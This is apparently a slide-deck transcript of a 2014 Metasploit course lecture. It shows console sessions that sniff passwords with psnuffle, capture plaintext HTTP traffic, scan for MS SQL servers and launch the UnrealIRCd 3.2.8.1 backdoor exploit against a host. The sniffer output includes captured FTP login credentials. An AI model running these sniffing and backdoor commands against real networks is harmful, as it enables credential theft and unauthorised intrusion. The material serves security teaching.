
Metasploit 2 Cerutti-IES 2014 Be regular and consistent. In everything, for your whole life. Especially in matters of security.


1 Metasploit 2 Cerutti-IES 2014 Be regular and consistent. In everything, for your whole life. Especially in matters of security.

2

3 What characterizes a good framework?

4 Frameworks

5

6

7 Microsoft SQL

8

9 Available payloads

10

11

12

13 Exiting (unloading) modules. Command: back

14

15

16 Password Sniffing
msf > use auxiliary/sniffer/psnuffle
msf auxiliary(psnuffle) > run
[*] Auxiliary module execution completed
[*] Loaded protocol FTP from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol SMB from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/smb.rb...
msf auxiliary(psnuffle) > [*] Loaded protocol URL from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
host_int=2716808549&ns_map=71378968_201026015668248%2C685054872_9274989464&user_id=44464479&nid=1396008608701611341&ts=1415041703
[*] Failed FTP Login: 172.16.2.32:55773-143.106.10.149:21 >> fernandocerutti / baguinha

17
[*] HTTP GET: 172.16.2.32:51435-108.160.167.155:80 http://notify10.dropbox.com/subscribe?host_int=2716808549&ns_map=71378968_201026015668248%2C685054872_9274989464&user_id=44464479&nid=1396008608701611341&ts=1415041759
[*] Successful FTP Login: 172.16.2.32:55773-143.106.10.149:21 >> anonymous /
[*] HTTP GET: 172.16.2.32:51435-108.160.167.155:80 http://notify10.dropbox.com/subscribe?host_int=2716808549&ns_map=71378968_201026015668248%2C685054872_9274989464&user_id=44464479&nid=1396008608701611341&ts=1415041815
[*] Successful FTP Login: 172.16.2.32:55774-143.106.10.149:21 >> anonymous / caraca

18 HTTP without security: in plain text
[*] HTTP GET: 172.16.2.32:55870-189.45.193.236:80 http://www.google-analytics.com/__utm.gif?utmwv=5.6.0&utms=7&utmn=2092148068&utmhn=www.slideshare.net&utmt=event&utme=5(search_content*search_pageload*Description%20HL%20Percentage)(216)8(member_type)9(FREE)11(1)&utmcs=UTF-8&utmsr=1280x800&utmvp=1091x648&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=15.0%20r0&utmdt=%27metasploit%27%20on%20SlideShare&utmhid=1487026120&utmr=0&utmp=%2Fsearch%2Fslideshow%3Fsearchfrom%3Dheader%26q%3Dmetasploit&utmht=1415042586183&utmac=UA-2330466-1&utmcc=__utma%3D186399478.1164355194.1409685008.1415014839.1415042574.33%3B%2B__utmz%3D186399478.1414784276.30.12.utmcsr%3Dgoogle%7Cutmccn%3D(organic)%7Cutmcmd%3Dorganic%7Cutmctr%3D(not%2520provided)%3B%2B__utmv%3D186399478.member%3B&utmjid=&utmu=6RAAACAAAAAAAAAAAAAAAAAE~
[*] HTTP GET: 172.16.2.32:55886-189.45.193.245:80 http://t0.gstatic.com/favicon?q=tbn:ANd9GcQC6FFzVoDxm5kT-E5saE0q8AysNEyZiXdMtJwzLZrrD-93ly2lmHo0qH_eNWClKa8vX-zMT3w

19 sniff
[*] HTTP GET: 172.16.2.49:40582-91.189.89.22:80 http://videosearch.ubuntu.com/v0/search?q=&split=true&form_factor=desktop
[*] HTTP GET: 172.16.2.49:46231-189.45.193.241:80 http://i.ytimg.com/vi/ROhRv09bCWU/mqdefault.jpg
[*] HTTP GET: 172.16.2.49:46232-189.45.193.241:80 http://i.ytimg.com/vi/mO1QBTG6EXs/mqdefault.jpg
[*] HTTP GET: 172.16.2.49:46233-189.45.193.241:80 http://i.ytimg.com/vi/GH7noNdd1l8/mqdefault.jpg
[*] HTTP GET: 172.16.2.49:46234-189.45.193.241:80 http://i.ytimg.com/vi/GDlm84gSRv4/movieposter.jpg
[*] HTTP GET: 172.16.2.49:46235-189.45.193.241:80 http://i.ytimg.com/vi/vekNlWVqEnQ/mqdefault.jpg
[*] HTTP GET: 172.16.2.49:41898-189.45.193.211:80 http://i.ytimg.com/vi/hWLN8AATXlw/movieposter.jpg
[*] HTTP GET: 172.16.2.49:38110-189.45.193.249:80 http://i.ytimg.com/vi/RKs6ikmrLgg/movieposter.jpg
[*] HTTP GET: 172.16.2.49:43160-189.45.193.236:80 http://i.ytimg.com/vi/ZQRONGsLu4A/mqdefault.jpg
[*] HTTP GET: 172.16.2.49:50594-72.21.91.75:80 http://s1.dmcdn.net/AMRhc/80x60-9ja.jpg
[*] HTTP GET: 172.16.2.49:50595-72.21.91.75:80 http://s1.dmcdn.net/tFBO/80x60-YN8.jpg
[*] HTTP GET: 172.16.2.49:50596-72.21.91.75:80 http://s1.dmcdn.net/oiaV/80x60-YM6.jpg
[*] HTTP GET: 172.16.2.49:50597-72.21.91.75:80 http://s2.dmcdn.net/zw9I/80x60-M5j.jpg
[*] HTTP GET: 172.16.2.49:50598-72.21.91.75:80 http://s2.dmcdn.net/MRil/80x60-2HI.jpg
[*] HTTP GET: 172.16.2.49:51624-189.45.193.207:80 http://i.ytimg.com/vi/DTBWoKjtur8/movieposter.jpg
[*] HTTP GET: 172.16.2.49:55606-189.45.193.222:80 http://i.ytimg.com/vi/SV0VxWxg0oI/movieposter.jpg
[*] HTTP GET: 172.16.2.49:33244-189.45.193.221:80 http://i.ytimg.com/vi/m2qB16oWYTs/movieposter.jpg
[*] HTTP GET: 172.16.2.49:56212-189.45.193.237:80 http://i.ytimg.com/vi/n6op2UcrOFg/movieposter.jp

20 MS SQL
msf > nmap -sU 192.168.0.0/24 -p1434
[*] exec: nmap -sU 192.168.0.0/24 -p1434
Starting Nmap 6.46 ( http://nmap.org ) at 2014-11-03 12:26 PST
Nmap scan report for 192.168.0.1
Host is up (0.049s latency).
PORT STATE SERVICE
1434/udp open|filtered ms-sql-m
MAC Address: 84:C9:B2:55:A7:03 (D-Link International)
Nmap scan report for 192.168.0.109
Host is up (0.0053s latency).
PORT STATE SERVICE
1434/udp closed ms-sql-m
MAC Address: 00:0C:29:6F:8D:07 (VMware)
Nmap scan report for 192.168.0.119
Host is up (0.17s latency).
PORT STATE SERVICE
1434/udp open|filtered ms-sql-m
MAC Address: 64:6C:B2:4E:62:B3 (Samsung Electronics Co.)

21
msf > use scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > set RHOSTS 192.168.0.0/24
RHOSTS => 192.168.0.0/24
msf auxiliary(mssql_ping) > set THREADS 20
THREADS => 20
msf auxiliary(mssql_ping) > exploit
[*] Scanned 026 of 256 hosts (010% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 079 of 256 hosts (030% complete)
[*] Scanned 104 of 256 hosts (040% complete)
[*] Scanned 141 of 256 hosts (055% complete)
[*] Scanned 154 of 256 hosts (060% complete)
[*] Scanned 182 of 256 hosts (071% complete)
[*] Scanned 206 of 256 hosts (080% complete)
[*] Scanned 244 of 256 hosts (095% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mssql_ping) >

22 Backdoor on Linux
use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) >
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 172.16.193.213
RHOST => 172.16.193.213
msf exploit(unreal_ircd_3281_backdoor) > exploit

23 Output of the backdoor exploit

24 Dotdefender Wget

